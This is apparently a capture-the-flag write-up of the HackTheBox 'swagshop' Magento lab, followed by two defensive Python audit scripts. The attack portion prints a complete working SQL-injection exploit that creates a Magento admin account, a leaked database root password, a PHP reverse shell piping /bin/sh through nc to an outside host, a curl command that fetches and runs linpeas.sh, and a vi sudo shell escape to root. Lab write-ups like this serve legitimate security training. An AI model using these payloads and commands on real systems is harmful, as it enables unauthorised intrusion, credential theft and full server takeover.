swagshop

Introduction:

The swagshop machine presents a vulnerable Magento installation: you need not look beyond basic enumeration and a search for public exploits once you have figured out the version.

Recon

NMAP Scan

eneloop@kinetic:.../hackthebox/swagshop/data$ sudo nmap -sS -sC -sV -T4 -O -oN nmap.swagshop.txt 10.10.10.140
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 08:26 EST
Nmap scan report for 10.10.10.140
Host is up (0.084s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.18 seconds

Enumeration

Wappalyzer

Footer version (home page):

© 2014 Magento Demo Store. All Rights Reserved.

Magento Versions

eneloop@kinetic:.../hackthebox/swagshop/data$ searchsploit magento
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection                       | php/webapps/38573.txt
eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Ser | php/webapps/38651.txt
Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Username']' Cros | php/webapps/32808.txt
Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController.php?email | php/webapps/32809.txt
Magento 1.2 - 'downloader/index.php' Cross-Site Scripting                          | php/webapps/32810.txt
Magento < 2.0.6 - Arbitrary Unserialize / Arbitrary Write File                     | php/webapps/39838.php
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution                       | php/webapps/37811.py
Magento eCommerce - Local File Disclosure                                          | php/webapps/19793.txt
Magento eCommerce - Remote Code Execution                                          | xml/webapps/37977.py
Magento Server MAGMI Plugin - Multiple Vulnerabilities                             | php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion                        | php/webapps/35052.txt
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass       | php/webapps/48135.php
----------------------------------------------------------------------------------- ---------------------------------

https://www.cloudways.com/blog/magento-versions/

MySQL password, readable from http://10.10.10.140/app/etc/local.xml:

<config>
    <global>
        <install>
            <date>Wed, 08 May 2019 07:23:09 +0000</date>
        </install>
        <crypt>
            <key>b355a9e0cd018d3f7f03607141518419</key>
        </crypt>
        <disable_local_modules>false</disable_local_modules>
        <resources>
            <db>
                <table_prefix></table_prefix>
            </db>
            <default_setup>
                <connection>
                    <host>localhost</host>
                    <username>root</username>
                    <password>fMVWh7bDHpgZkyfqQXreTjU9</password>
                    <dbname>swagshop</dbname>
                    <initStatements>SET NAMES utf8</initStatements>
                    <model>mysql4</model>
                    <type>pdo_mysql</type>
                    <pdoType></pdoType>
                    <active>1</active>
                </connection>
            </default_setup>
        </resources>
        <session_save>files</session_save>
    </global>
    <admin>
        <routers>
            <adminhtml>
                <args>
                    <frontName>admin</frontName>
                </args>
            </adminhtml>
        </routers>
    </admin>
</config>

Exploitation

Install Date

(py2) eneloop@kinetic:.../hackthebox/swagshop/data$ cat create_admin_37977.py 
import requests
import base64
import sys

target = "http://10.10.10.140/index.php"

if not target.startswith("http"):
    target = "http://" + target

if target.endswith("/"):
    target = target[:-1]

target_url = target + "/admin/Cms_Wysiwyg/directive/index/"

q="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','[email protected]','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""


query = q.replace("\n", "").format(username="enp", password="enp12345")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decodes to {{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url, 
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
if r.ok:
    print "WORKED"
    # The message below is the original script's hard-coded text; the account
    # actually created is the username/password passed to format() above.
    print "Check {0}/admin with creds forme:forme".format(target)
else:
    print "DID NOT WORK"

(py2) eneloop@kinetic:.../hackthebox/swagshop/data$ 
(py2) eneloop@kinetic:.../hackthebox/swagshop/data$ python ./create_admin_37977.py 
WORKED
Check http://10.10.10.140/index.php/admin with creds forme:forme
(py2) eneloop@kinetic:.../hackthebox/swagshop/data$ 

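The injected INSERT above leaves a recognisable footprint in admin_user: placeholder names, an MD5 hash salted with the literal 'rp', an `extra` blob copied from an existing admin, and a row that has never logged in. As an added example (not from the original writeup or the exploit), this Python 3 audit flags rows carrying those signals over constructed sample rows; the row layout and the legitimate admin's hash are assumptions, not a statement of Magento's real storage format.

```python
import hashlib
import re
from datetime import datetime, timedelta

# Signals taken from the injected INSERT shown above: placeholder first/last
# names, an MD5 hash salted with the literal 'rp', an `extra` blob copied via
# MAX(extra), and a row that has never logged in (lognum = 0).
PLACEHOLDER_NAMES = {"firstname", "lastname"}
RP_SALTED_MD5 = re.compile(r"^[0-9a-f]{32}:rp$")

def audit_admin_users(rows, now, window_hours=24):
    """Return {username: [reasons]} for admin_user rows that look injected."""
    # Oldest creation time per distinct `extra` value: the exploit copies an
    # existing admin's blob, so a newer row sharing it is the suspect one.
    earliest = {}
    for r in rows:
        if r["extra"] is not None:
            earliest[r["extra"]] = min(earliest.get(r["extra"], r["created"]), r["created"])
    findings = {}
    for r in rows:
        reasons = []
        if {r["firstname"].lower(), r["lastname"].lower()} & PLACEHOLDER_NAMES:
            reasons.append("placeholder first/last name")
        if RP_SALTED_MD5.match(r["password"]):
            reasons.append("MD5 hash with fixed salt 'rp'")
        if r["extra"] is not None and r["created"] > earliest[r["extra"]]:
            reasons.append("`extra` blob identical to an older admin's")
        if r["lognum"] == 0 and now - r["created"] < timedelta(hours=window_hours):
            reasons.append("created within %dh and never logged in" % window_hours)
        if reasons:
            findings[r["username"]] = reasons
    return findings

# Constructed sample rows (not a real dump): one long-standing admin and one
# row shaped exactly like the exploit's INSERT for user enp / enp12345.
NOW = datetime(2021, 3, 13, 9, 0)
SHARED_EXTRA = 'a:1:{s:11:"configState";a:0:{}}'
SAMPLE_ROWS = [
    {"username": "admin", "firstname": "Store", "lastname": "Owner",
     # constructed hash of a different shape; no claim about Magento's real format
     "password": hashlib.sha256(b"salt-placeholder" + b"pass-placeholder").hexdigest() + ":salt-placeholder",
     "created": datetime(2019, 5, 8, 7, 23), "lognum": 57, "extra": SHARED_EXTRA},
    {"username": "enp", "firstname": "Firstname", "lastname": "Lastname",
     "password": hashlib.md5(b"rp" + b"enp12345").hexdigest() + ":rp",
     "created": NOW - timedelta(minutes=10), "lognum": 0, "extra": SHARED_EXTRA},
]

if __name__ == "__main__":
    for user, why in audit_admin_users(SAMPLE_ROWS, NOW).items():
        print(user, "->", "; ".join(why))
```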

Admin Login

Froghopper exploit

https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper

PHP reverse shell upload

<?php
passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.20 4444 >/tmp/f");
?>

Category Upload shell

Verify Upload

Froghopper Exploit

Froghopper Preview Template

Attacker listener

eneloop@kinetic:.../tools/reverse-shell/php$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.140] 60510
/bin/sh: 0: can't access tty; job control turned off
$ 
$ whoami
www-data
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
haris:x:1000:1000:haris,,,:/home/haris:/bin/bash
$ cd /home/haris
$ ls -l
total 4
-rw-r--r-- 1 haris haris 33 May  8  2019 user.txt
$ cat user.txt


Post-exploit/PrivEsc

Linpeas

$ curl http://10.10.14.20:8000/linpeas.sh|bash

[+] Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
Defaults	env_reset
Defaults	mail_badpass
Defaults	secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
root	ALL=(ALL:ALL) ALL
%admin ALL=(ALL) ALL
%sudo	ALL=(ALL:ALL) ALL
www-data ALL=NOPASSWD:/usr/bin/vi /var/www/html/*

$ 
$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
$ sudo /usr/bin/vi /var/www/html/*
Vim: Warning: Output is not to a terminal
Vim: Warning: Input is not from a terminal


<h4>Open Software License ("OSL") v. 3.0</h4>

<p>This Open Software License (the "License") applies to any original work of au
thorship (the "Original Work") whose owner (the "Licensor") has placed the follo
wing licensing notice adjacent to the copyright notice for the Original Work:</p
>
<h5>Licensed under the Open Software License version 3.0</h5>
:!/bin/shof Copyright License. Licensor grants You a worldwide, royalty-free, no
n-exclusive, sublicensable license, for the duration of the copyright, to do the
 following:</p>
<ul class="disc">
    <li>to reproduce the Original Work in copies, either alone or as part of a c
ollective work</li>
    <li>to translate, adapt, alter, transform, modify, or arrange the Original W
ork, thereby creating derivative works ("Derivative Works") based upon the Origi
nal Work</li>
    <li>to distribute or communicate copies of the Original Work and Derivative
Works to the public, with the proviso that copies of Original Work or Derivative
 Works that You distribute or communicate shall be licensed under this Open Soft
ware License</li>
    <li>to perform the Original Work publicly</li>
    <li>to display the Original Work publicly</li>
</ul>
:!/bin/sh

whoami
root
cd /root
ls
root.txt


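The sudoers rule above hands www-data a root shell because vi has a built-in shell escape and the wildcard matches more than the intended files. As an added example (not from the original writeup), this Python 3 audit parses single-line user specifications and flags exactly those traits; the sample text is reconstructed from the LinPEAS output above, and the sudoedit / `Defaults!<cmd> noexec` remediation it suggests is the standard sudo mitigation.

```python
import re

# Editors and pagers with a built-in shell escape (vi's ':!' is the one used above).
SHELL_ESCAPE_BINARIES = {"vi", "vim", "view", "less", "more", "man"}
# user  host=(runas)  [NOPASSWD:] cmd, cmd ...   (single-line user specifications only)
SPEC_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")

def parse_spec(line):  # -> (who, runas, nopasswd, [commands]) or None
    m = SPEC_RE.match(line)
    if not m:
        return None
    cmds = m.group("cmds").strip()
    nopasswd = cmds.startswith("NOPASSWD:")
    if nopasswd:
        cmds = cmds[len("NOPASSWD:"):]
    runas = m.group("runas") or "root"  # sudo runs as root when no runas list is given
    return m.group("who"), runas, nopasswd, [c.strip() for c in cmds.split(",") if c.strip()]

def audit_sudoers(text):
    """Return [(who, runas, command, [reasons])] for rules that amount to a root shell."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        spec = parse_spec(line)
        if spec is None:
            continue
        who, runas, nopasswd, cmds = spec
        for cmd in cmds:
            if cmd == "ALL":
                continue  # unrestricted sudo is a policy decision, not a misconfigured rule
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            reasons = []
            if binary in SHELL_ESCAPE_BINARIES:
                reasons.append("%s has a shell escape; use sudoedit or 'Defaults!%s noexec'" % (binary, cmd.split()[0]))
            if any(ch in cmd for ch in "*?["):
                reasons.append("wildcard in the argument list matches more than the intended path")
            if reasons and nopasswd:
                reasons.append("NOPASSWD removes the password prompt")
            if reasons:
                findings.append((who, runas, cmd, reasons))
    return findings

# Constructed sample: user-specification lines as LinPEAS printed them from /etc/sudoers above.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
www-data ALL=NOPASSWD:/usr/bin/vi /var/www/html/*
"""
```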

Notes: